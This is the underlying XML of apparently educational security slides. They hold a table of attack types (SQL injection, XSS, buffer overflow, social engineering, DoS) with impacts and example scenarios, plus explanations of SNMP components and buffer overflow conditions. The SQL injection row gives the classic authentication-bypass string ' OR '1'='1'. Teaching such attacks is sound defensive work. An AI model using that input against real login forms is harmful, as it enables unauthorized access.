                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1869281">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1869281">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="361825">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Attack Type</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Typical Impact</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Example Scenario</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="371475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>SQL Injection</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Injecting malicious SQL code into input to manipulate or extract data from databases</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Data theft, modification, unauthorized access</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>' OR '1'='1'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t> bypasses authentication</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="371475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Cross-Site Scripting (XSS)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Injecting malicious scripts into webpages viewed by others to hijack sessions or steal info</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Credential theft, user impersonation, malware</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Malicious JavaScript in a comment steals cookies</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="371475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Buffer Overflow</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Writing more data than buffer size allows, overwriting memory to execute attacker code</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>System compromise, arbitrary code execution</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Overflow in input buffer lets attacker run </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>shellcode</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="371475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Social Engineering</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Manipulating people to disclose confidential info, often impersonation</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Credential theft, fraud, unauthorized access</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Phishing email impersonating IT admin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="371475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Denial of Service (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>DoS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Flooding a service with excessive traffic to make it unavailable</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Service downtime, loss of availability</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Botnet launches massive traffic to crash a website</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 4">
            <a:extLst>
              <a:ext uri="{D9EFF4B3-7629-4C23-B2FB-023B227F93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CD7DF2-7A36-4893-B236-37CD969597B3}"/>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47EB1B55-5AAF-414E-8FF0-FDBCA3428FE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513EB01C-3FFA-4204-B138-E4686A2B80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6F0BA7A-B99E-4A05-B539-1116D2E2D3B0}"/>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SNMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{B548641E-A89B-4E5A-838A-9B1E9042CB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33D4A3-A610-4B47-BA14-9C5A1EFFD1EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="104999"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Managed Device</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>A managed device is a network device with the SNMP service enabled allowing unidirectional (read) or bidirectional (read/write) communication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="104999"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Agent</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>The agent is the software running on the managed device which is responsible for handling the communication. The agent translates device-specific configuration parameters into an SNMP format for the Network Management System.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="104999"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Network Management System (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>NMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>The Network Management System is the software that is actually managing and monitoring networked devices.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{5D0DB1EC-C30F-41CE-AFB7-7883879FB06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65AC65-2F69-4CCB-B52C-23FC4B52B137}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{F9B493FA-6009-4DA6-87EF-0A92F45CEC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3CFE12-7592-4559-92E4-212918747751}"/>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49CCD709-8509-4F79-A717-A36BC5D08B65}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{DA5DDFDC-82D1-4A34-8B1C-15705919EF1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BBD04B-012D-483F-8E76-D6E0FCFD0434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="4739887"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{3B64BD66-A12C-4FEF-86E0-5238A4DC6FD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7E916AC-3ECA-408F-AAD9-132975E2C0FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="7953366"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 &amp; countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{14D9FE1C-B371-4B5A-BEB4-A84BC7D269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DCC03C6-E231-4EFB-804B-2304BFCABF2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="7953366" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
            <a:round/>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1. SNMP Services Enumeration &amp; countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 4">
            <a:extLst>
              <a:ext uri="{C7988694-7522-4643-A8E6-3F47B005097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0CB2A2-DC85-4A04-8316-5C76AA7D55A4}"/>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A818E6D3-86FC-4B7F-B90A-F6BB4EE0CE8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AB09F04D-F8DF-4194-9C51-66F20CB37A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C63F51-669A-4EAB-8D92-CA8ED5E26434}"/>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Description</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{3B3B7787-D651-4702-8E70-F7F590BC02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DB4376F-BF57-40C2-98A4-19E8E62F2882}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>A buffer overflow attack takes place when an attacker manipulates the coding error to carry out malicious actions and compromise the affected system. The attacker alters the application’s execution path and overwrites elements of its memory, which amends the program’s execution path to damage existing files or expose data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>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lgn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>A buffer overflow vulnerability will typically occur when code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Is reliant on external data to control its behavior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Is dependent on data properties that are enforced beyond its immediate scope</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Is so complex that programmers are not able to predict its behavior accurately</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{0D693CC7-B09D-4394-8EED-B910FED2D8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7C65A69-FF80-4342-AF44-5B211547BE85}"/>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BB92E9EE-EFD1-4612-BEDA-320A250784E9}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
